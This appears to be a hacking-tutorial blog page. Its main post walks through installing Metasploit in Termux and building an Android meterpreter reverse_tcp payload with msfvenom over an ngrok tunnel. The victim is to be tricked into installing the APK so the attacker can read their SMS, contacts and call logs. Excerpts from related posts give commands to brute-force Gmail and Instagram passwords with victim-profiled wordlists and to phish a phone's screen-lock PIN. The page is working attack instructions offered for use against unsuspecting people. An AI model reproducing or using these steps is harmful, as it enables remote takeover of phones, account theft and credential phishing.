Skip to main content

Install Metasploit in Termux And Remote Control Android device⚠️⚠️



How To Install Metasploit in Termux






Commands





1.pkg update

2.pkg install repo

3.pkg install unstable-repo

4.pkg install metasploit







wait for 10-15 mints metasploit successfully installed After istallation it is show as the image  given above as MetaSploit Frame work installation Finished..

5.now open metasploit-framework

6.msfconsole 


It takes 2 min and open a window like the image given below





Open  new terminal and write Command= ./ngrok tcp 4345

It will show a window like this below given









Again Open one more terminal to create a payload

Commands



1. msfvenom -p android/meterpreter/reverse_tcp LHOST= ngrokip LPORT= ngrokport R>alkr.apk

[AFTER LHOST={RED} TYPE AS SHOWN IN IMAGE BELOW AFTER LPORT={YELLOW}TYPE AS SHOWN INTHE IMAGE (you get in ngrok terminal)]   



Run this command and wait for 2 mints.

Now payload is created

2. ls   (run ls command to check  your Apk file location)

App is saved in home folder

To copy the app to your storage use command

2.cp alkr.apk /storage/emulated/0/DCIM/  (you can change to your precised location)

Send the Apk file to victim


Make the Victim install and open the app



 Open Metasploit Framework


Again open a new session  


Commands

1.msfconsole 

2.use exploit/multi/handler

3.set payload android/meterpreter/reverse_tcp 

4.set LHOST localhost

5.set LPORT 4543

6.exploit

After that it will show a window like the image given below


  • All Finished  Now Just add command 'help' for all commands getting sms, contacts, call logs.. etc Enjoy

  1. Youtube Video Tutorial: https://youtu.be/iziAU4UvOEQ

Comments

Popular posts from this blog

HACK GMAIL ACCOUNT PASSWORD USING TERMUX LATEST 2020

HACK GMAIL ACCOUNT PASSWORD  Open Termux $ pkg update $ pkg upgrade $ pkg install python $ pkg install python2 $ pkg install git $ git clone  https://github.com/ALKR-HACKHECKZ/alkrmail.git $ ls $ cd alkrmail $ ls $ python alkrmail.py An Inter Face will open as "amailhack' Enter 1 For Starting Attack Enter The password File I Have Added My File Pass.txt  You Can Add Your File...Or you Can Add mine Wait For The Right Password  Enjoy🤩 Youtube Video Tutorial : https://youtu.be/N90zM_pB0co

HOW TO HACK INSTAGRAM USING TERMUX LATEST 2020 WOKING TRICK

HACK INSTAGRAM BRUTEFORCE  WOKING TRICK Steps: Termux App link :  https://play.google.com/store/apps/details?id=com.termux&hl=en Open termux: $ pkg upgrade $ pkg update $ pkg install python $ pkg install python3 $ pkg install git $ git clone  https://github.com/ALKR-HACKHECKZ/alkrinsta.git $ ls $ cd alkrinsta  $ ls $ pkg install pip $ pip install requests $ pip install bs4 You can either create a password list using cupp or you can download other password lists. To make Password list using Cupp Follow steps Below $ python3 cupp.py $ python3 cupp.py -i 🤔Give the Needed Information Of Victim and create the password list  🧐To run the created password list you have to rename the file to "pass.txt" $ mv filename.txt pass.txt     {filename.txt= your created password list you can see your password list name by  ls command } $ cat pass.txt $ python alkrinsta.py ⚠️When Asking 

How to hack screelock pin/password using termux

HACK PHONE LOCK PIN/PASSWORD COMMANDS apt update apt upgrade pkg install git git clone  https://github.com/ALKR-HACKHECKZ/lockphish.git cd ls chmod +x * [ TURN ON HOTSPOT ] cd lockphish Pkg install bash bash lockphish.sh Copy link send it to victim Get the ip adress of victim Get the screelock password Get the Device Information Done Enjoy🤩🤩 Youtube Video Tutorial :   https://youtu.be/5U_GFIqtwuI